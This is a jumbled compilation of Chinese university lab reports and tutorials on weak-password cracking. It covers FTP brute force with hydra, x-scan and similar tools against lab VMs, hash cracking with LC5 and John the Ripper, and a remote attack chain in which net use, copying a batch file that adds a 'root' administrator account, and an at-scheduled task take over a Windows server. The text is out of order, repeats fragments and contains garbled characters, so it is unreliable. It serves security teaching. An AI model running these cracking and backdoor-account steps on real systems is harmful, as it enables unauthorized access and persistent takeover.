弱口令破解实验
实验09 FTP弱口令扫描
FTP弱口令扫描7、2、1 背景描述FTP服务器,则就是在互联网上提供存储空间得计算机,它们依照FTP协议提供服务。
FTP得全称就是File Transfer Protocol(文件传输协议)。
顾名思义,就就是专门用来传输文件得协议。
简单地说,支持FTP协议得服务器就就是FTP服务器。
一般来说,用户联网得首要目得就就是实现信息共享,文件传输就是信息共享非常重要得一个内容之一。
Internet上早期实现传输文件,并不就是一件容易得事。
Internet就是一个非常复杂得计算机环境,有PC,有工作站,有MAC,有大型机,据统计连接在Internet上得计算机起码已有亿万台,而这些计算机可能运行不同得操作系统,有运行Unix得服务器,也有运行Windows得PC机与运行MacOS得苹果机等等,而各种操作系统之间得文件交流问题,需要建立一个统一得文件传输协议,这就就是所谓得FTP。
基于不同得操作系统有不同得FTP 应用程序,而所有这些应用程序都遵守同一种协议,这样用户就可以把自己得文件传送给别人,或者从其它得用户环境中获得文件。
与大多数Internet服务一样,FTP也就是一个客户机/服务器系统。
用户通过一个支持FTP协议得客户机程序,连接到在远程主机上得FTP服务器程序。
用户通过客户机程序向服务器程序发出命令,服务器程序执行用户所发出得命令,并将执行得结果返回到客户机。
比如说,用户发出一条命令,要求服务器向用户传送某一个文件得一份拷贝,服务器会响应这条命令,将指定文件送至用户得机器上。
客户机程序代表用户接收到这个文件,将其存放在用户目录中。
在FTP得使用当中,用户经常遇到两个概念:“下载”(Download)与“上载”(Upload)。
“下载”文件就就是从远程主机拷贝文件至自己得计算机上;“上载”文件就就是将文件从自己得计算机中拷贝至远程主机上。
用Internet语言来说,用户可通过客户机程序向(从)远程主机上载(下载)文件。
系统弱口令案例
系统弱口令案例
我给你讲个系统弱口令的超搞笑案例哈。
就有这么一个小公司,他们弄了个办公系统。
那个负责设置密码的哥们儿呢,可能是偷懒或者脑回路清奇。
他给管理员账号设置的密码是“123456”,对,就是这种简单到不能再简单的密码。
然后有一天,公司里一个刚来不久的小年轻,闲得无聊就瞎试密码。
他就先试了试这种超简单的组合,结果一下子就登录进管理员账号了。
这小年轻进去之后都懵了,他本来就只是想试试看,没想到真的能进去。
他在里面捣鼓了一会儿,看到一些机密文件啥的,可把他吓了一跳。
还好这小年轻是个老实孩子,赶紧跟领导说了这事儿。
你说这要是被别有用心的人发现了,那公司的机密信息不就全暴露了嘛。
这就是典型的因为弱口令,差点捅出大篓子的例子。
还有一个例子呢。
有个学校的图书馆系统,管理员设置密码的时候,居然用了自己的生日,而且还是那种没加密的格式,就直接年月日。
有个调皮的学生,知道这个管理员老师平时大大咧咧的,就猜这个密码会不会是生日呢。
他就去打听这个老师大概的年龄范围,然后找了几个可能的生日组合试了试,还真就进去了。
这学生进去之后倒也没干坏事,就是改了改自己的借阅权限,多借了几本书。
但这也说明啊,弱口令就像一扇没锁好的门,随便谁都能推开呢。
实验8-账号口令破解与保护
贵州大学实验报告
学院:计算机科学与技术学院专业:信息安全班级:
1.在pc上安装LophtCrack
(1)从下载最新版的lophtcrack 目前最新版本LC5
(2)双击安装程序LC5setup,安装lophtcrack,根据提示完成安装。
如图:
2.使用LC5检测弱口令
LC5能检测windows和unix/linux系统用户的口令,并根据需要,要求用户修改口令,具体使用方法如下:
(1)打开LC5,此时该软件会出现一个向导对话框,读者可以根据向导进行设置。
如图:
(2)单击下一步,在这个对话框中,读者可以用于检测的加密口令的来源,一共有四种来愿,分别是:
本机注册表,需要系统管理员权限
同一个域内的计算机,需要系统管理元的权限
NT系统中的SAM文件
监听本机网络中传输的口令HASH表。
如图:
(3)单击下一步,该对话框中列出的是检测口令的方法,一共有四种方法,分别是
快速检测普通检测强口令检测定制检测。
如图:
(4)单击下一步,在该对话框中选择显示的方法,按系统默认的值即可。
(5)单击下一步,该对话框将前面选择的内容显示出来,单击完成即开始检测。
检测结果如图:
有些用户的弱口令被检测出来了,此时,可以选择菜单中的remidiate-disable命令,禁止该帐号,或者选择forcepasswordchange命令,强迫该用户在下次登录时修改口令。
ftp口令暴力破解实验
实验环境VMware、Windows 2003、Serv-u 6.4实验环境VMware、Windows 2003、Serv-u 6.4破解软件x-scan 、FTPcrackeralb、ftpscan、brutus密码字典构建自定义的用户名和口令字典文件:ftpuser.txt、ftpps.txt实验目标1、成功破解匿名用户2、成功破解用户名和密码相同的情况,用户名为test3、查看服务器日志,发现暴露破解4、整理常见ftp用户名和弱口令字典环境搭建在虚拟机中安装Serv-u 6.4,分别创建anonymous和test两个用户,anonymous不需要密码,test密码为test。
使用x-scan破解将ftpuser.txt和ftpps.txt复制到X-Scan-v3.3\dat目录下。
运行x-scan,在检查范围处输入测试地址,本次为192.168.209.128,扫描模块选择ftp弱口令,字典文件选择刚才的两个txt文件。
破解过程可能比较长,结束后发现anonymous和test两个用户已经成功破解。
Ftpscan是命令提示符下扫描FTP弱口令账号的小工具,速度非常快的。
使用简单。
把准备好的用户名和口令字典复制到ftpscan目录下,并重命名为 password.dic和username.dic,执行命令ftpscan 192.168.209.128 200破解成功的用户会自动写入ftpscan目录下的ftpscan.txt。
运行brutus-aet2,Target处输入测试地址192.168.209.128,Type处选择Ftp,Authentication Options处分别选择自定义的字典文件。
FTPcracker是一个傻瓜式的密码破解软件,不能选择自定义的字典,也不能改变扫描频率,只有输入测试地址即可,成功率相当较低。
破解过程中查看SERV-U中活动选项,用户标签中有多个用户正在尝试登陆,查看域日志标签,可以看到同一个用户大量登陆日志。
网络攻防技术-破解Linux用户弱口令
-e string -f /path/charset.lst
指定到某字符串即停止生成口令。 指定一个字符集文件,该文件可以用户自定义,也可以使用Crunch自带的字符集文件 /etc/share/crunch/charset.lst,该文件中80多种字符集,可以选择其中一种。
-o filename
将生成的口令保存到指定文件。
5
任务描述
通过渗透测试团队前期的检测,发现目标主机存在用户账户可能存在弱口令的情况。作为渗 透测试团队成员,请使用Kali中的John the Ripper软件对目标主机的系统弱口令进行破解, 使用Hydra软件对SSH服务弱口令进行破解,以验证目标系统是否真的存在弱口令。
任务分析
1.john软件 John the Ripper(简称john)是一款基于字典攻击的免费的密码破解工具,用于在已知密文
字典破解模式,FILE指定了字典文件,从FILE中读取单词进行破解,若后接“--stdin” 则从标准输入端读取单词,后接“--pipe”则批量读取,并允许规则。
增强破解模式,自动尝试所有的可能的字符组合当作密码来破解,即使用穷举法来进行 破解。在/usr/share/john/john.conf文件的[Incremental:******]部分定义了许多种MODE, 可以选择一种来进行破解。
图4-7 查看john上一次的输出结果
项目四 Linux系统的攻击与防范
19
2.使用hydra破解SSH口令
步骤1 准备好用户名文件和口令字典文件,如图4-8所示。用户名文件可以使用社会工程学攻 击方式对目标主机可能的用户名进行猜测。口令字典文件可以使用前面所讲的三种方法来生 成。
图4-8 用户名文件和口令字典文件
FTP弱口令扫描 (1)
实验FTP弱口令扫描一、实验目的(1)了解FTP弱口令扫描原理(2)学会使用FTP弱口令扫描器和掌握口令设计的原则(3)实验环境:登录控制台,开启linux与windows靶机,在windows靶机建立FTP 服务器,利用linux靶机的hydra 进行扫描,找到windows靶机的FTP用户名与密码,利用其登录到windows靶机的ftp服务(4)编程实现FTP弱口令扫描程序(选作,baidu)二、实验要求(1)准确完成实验内容,得出实验结果(2)附实验步骤截图三、实验步骤1、攻击者网络配置:(linux靶机)192.168.10.191ifconfig –a2、攻击目标网络配置(windows靶机)192.168.10.181Ipconfig3登录windows靶机,打开D:\xampp\FileZillaFTP 下的FileZilla Server Interface.exe ,新建一个用户,命名为:admin(自己的姓名缩写yxq123),密码:123456,指定可以访问的文件夹“D:\攻防工具包\ftp目录”,保存。
(已经存在bluedon用户)4、登录linux靶机,通过字典来破解windows靶机的FTP用户名和密码其中user.txt存放常用的用户名,password.txt存放常用的密码,我们可以先在user.txt,password.txt添加常用的用户名和密码,丰富字典文件具体步骤如下:1)linux靶机,登录terminal(Applications-----Accessories---Terminal)#ls#gedit user.txt添加自己名字的缩写yxq123,保存,截图#gedit password.txt添加密码 administrator ,保存2)#hydra 192.168.10.181 ftp –L user.txt –P password.txt –t 20 查到用户名和密码在物理机,IE输入ftp://192.168.10.181用找到的用户名和密码登录。
口令破解方法
字典法破解是使用一个包含大多数字典单词的文件 (通常为.txt文件,并且每行只有一个字符串,内容主 要为家庭或单位的电话号码、身份证号码或一些有规律 的字符等等)作为用户口令输入给远端主机,以此来猜 测用户口令,直到口令验证通过为止。
开始 选择一个网络用户帐号名
网络用户帐户
选取一个口令 口令比较验证证
成功
口令字典库
失败
显示被破解的口令
字典库中口令是否选完? 否
是
结束
图3-1 口令破解流程图
(3)组合法
穷举法能发现所有的口令,但破解口令的时间可能很长。 字典法速度快,但只能发现字典单词口令。当用户把口令如 mygard变成mygard456等字母和数字混合形式时,破解这种 口令的一种方法是使用字典单词但又在单词的尾部串接几个 字母和数字,即组合法。
【参考文献】 1、《Windows 信息安全原理与实践》 清华大学出版社
赵树升等。 2、《网络攻防技术原理与实战》,科学出版社 卿思汉
等。 3、《MFC Windows 应用程序设计》,清华大学出版社,
任哲等
3、编写口令枚举程序 定义程序头文件中应包含的头文件和链接库。建议包 含winsock2.h、lm.h、winnetwd.h和lmaccess.h头文 件。链接库则根据自己的程序编写情况定义。 与目标计算机建立连接。 获取目标计算机的用户列表。 获取目标计算机的口令。 将目标机口令显示在窗口中 可能用到的API函数 WNnetAddConnection2 建立与目标计算机的连接。 WNnetCancelConnection2 中断一个已经存在的网 络连接。 WNnetOpenEnum 开始网络资源枚举或网络连接枚举。 WNnetEnumResource 继续网络资源枚举或网络连接 枚举。 NetUesEnum 枚举产生用户列表。
【信息安全技术】实验报告:口令破解
【信息安全技术】实验报告:⼝令破解【信息安全技术】实验报告:⼝令破解⼀、实验环境系统环境:Windows⽹络环境:交换⽹络结构实验⼯具:LC5 SuperDic⼆、实验内容新增模拟⽤户及⽤户名;利⽤字典⽣成器⽣成字典⽂件;利⽤⼝令破解器破解本地⽤户密码。
三、实验过程1.创建本地⽤户通过右键“计算机”-> “管理” -> “本地⽤户和组”-> 在空⽩处右键“新⽤户”,创建本地⽤户名和密码2.⽣成字典⽂件在字典⽣成器软件⾥进⾏如下操作:(1)设置⽣⽇范围及格式(2)设置⽂件⽣成路径及⼝令位数3.进⾏字典破解(1)通过Session -> Session Options 设置破解⽅式及依据的字典⽂件(2)通过Session->Import 导⼊本地⽤户(3)通过Session->Begin Audit 开始破解如图3.进⾏字典破解(1)通过Session -> Session Options 设置破解⽅式及依据的字典⽂件(2)通过Session->Import 导⼊本地⽤户(3)通过Session->Begin Audit 开始破解破解结果如图4.进⾏暴⼒破解(1)破解“alphabet+numbers”形式的密码1)通过Session -> Session Options 设置破解⽅式(Brute Force Crack)及密码组成元素(alphabet+numbers)2)通过Session->Begin Audit 开始破解(2)破解“Custom(⾃定义)”形式的密码1)通过Session -> Session Options 设置破解⽅式(Brute Force Crack)及密码组成元素(Custom)2)通过Session->Begin Audit 开始破解⾃定义字符集如图破解结果如图四、实验总结本次实验相对是⽐较容易的,但是遇到了很多英⽂,所以以后还是要加强英语的学习,实验中我学到了⽤户密码的破解,很有收获。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
图3
图4 3. 执行 X-Scan-v3.3-cn 对 Windows Server 2003 进行账户扫描如图 5,得到用
户名和密码如图 6
图5
图6
4. 输入命令 net use \\服务端 ip\ipc$ “123456” /user:”administrator”,如下图 7 示。
图7
5. 口令中不应包含本人、父母、子女和配偶的姓名和出生日期、纪念日期、登录名、E-mail 地址等等与本人有关的信息,以及字典中的单词。
6. 口令不应该为用数字或符号代替某些字母的单词,例如:Pas$W0rd。 7. 口令应该易记且可以快速输入,防止他人从你身后很容易看到你的输入。 8. 至少 90 天内更换一次口令,防止未被发现的入侵者继续使用该口令。同时,有很多行
3. 口令不应该为连续的某个字符(例如:A 口令应该为以下四类字符的组合,大写字母(A-Z)、小写字母(a-z)、数字(0-9)和特殊字 符(!@#$%^&*()-_=+\|[]{};:'"<>,.?/~`),每类字符至少包含一个。如果某类字符只包含一 个,那么该字符不应为首字符或尾字符。
5. 输入命令 copy 1.bat \\服务端 ip\c$, 复制 1.bat 到服务器 c 盘。1.bat 为添 加用户并提升为管理员的批处理程序,可右键编辑查看此文件内容,如图 8
图8 注:文件 1.bat 内容如下: @echo off net user root 123456 /add net localgroup administrators root /add 意思是添加一个用户名为 root,密码为 123456 的用户,并提升为管理员。
弱口令破解
场景
弱口令通常认为容易被别人猜测到或被破解工具破解的口令均为弱口令,比如常用的英 文单词,生日数字等。
目前的字典档攻击、枚举攻击等可以轻而易举的破解弱口令。如果你使用弱口令,就像 把密码放在键盘下面的纸片上,是非常危险的。
实验目标
掌握弱口令猜解的基本流程 理解安全口令组成的要素 具有能够对系统设定复杂的密码的安全意识
实验拓扑
VM Server
VM Client
实验环境 [实验必备环境]
Server:Windows Server 2003 Client:WindowsXP X-Scan-v3.3-cn 扫描工具
[服务端] [客户端] [工具] [其他所需设备,例如防火墙、IDS 等]
实验过程指导 [实验完成步骤,力求完整]
8. 切换至服务器桌面。 9. 在桌面,右击“我的电脑”,在弹出的对话窗选择“管理 10. 弹出计算机管理的对话框,单击左边“本地用户和组”,然后单击下面用户,
可以看到,用户“root”,已经成功添加,如图 11
图 11
如何防止弱口令
1. 不使用空口令或系统缺省的口令,因为这些口令众所周之,为典型的弱口令。 2. 口令长度不小于 8 个字符。
为也会使口令被泄漏。
6. 输入命令 net time \\服务端 ip 看服务器时间,如图 9 示
图9
7. 输入命令 at \\服务段 ip 03:05 c:/1.bat,此条命令是添加一条任务,在服务 器时间 03:05 分运行程序 1.bat,如图 10 所示
图 10 注:此事件一定要比服务器时间快,不然无法启动。 此时稍等片刻。
1. 启动 Windows Server 2003 服务器 使用服务器管理员 Administrator,密码:123456 进行登录 更改 WindowsServer2003 服务器上的 Server 服务启动类型为手动,并启
动如图 1
图1 2. 在客户端安装 X-Scan-v3.3-cn 扫描工具,并且设定扫描模块如图 2 到 4